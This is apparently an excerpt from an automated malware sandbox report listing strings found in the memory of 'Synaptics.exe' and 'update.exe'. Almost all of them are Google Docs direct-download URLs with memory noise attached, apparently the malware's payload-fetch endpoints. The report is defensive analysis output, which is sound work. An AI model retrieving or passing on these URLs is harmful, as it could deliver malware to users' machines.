                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...$
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...d
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...m
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigiL0$Zs
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadory
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloados
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloados:
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadot
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpS$Z
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpkUrY/
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpxc
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq(eXS
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqA
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqD
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrBel
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrM
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrg
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrmg
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojec
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrv
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrver
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.cn
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads:#
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads=
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsM
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsearc
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsi
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsr
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-W
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt;c
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd0
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd1
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadte7
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen-
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen6
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniE
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniyor...
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlent
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtn
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadto
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtu
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduE
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduR
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua-fcQ3Xf:
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadui?
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadulT
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadun
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadur
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.J
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadutubeu
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.0000000000875000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvQ
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047221664.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw7
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwg#Y1
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadws
                              Source: Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxR
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxl
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxlsx
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxr
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxred.
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyGhY
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..R
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..c
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoutA7
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyzh
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047221664.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz76
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadza
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~P&YS
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: update.exe, 00000006.00000003.1904510384.00000000022F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 0000000A.00000002.2806590322.00000000022C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.goog=:
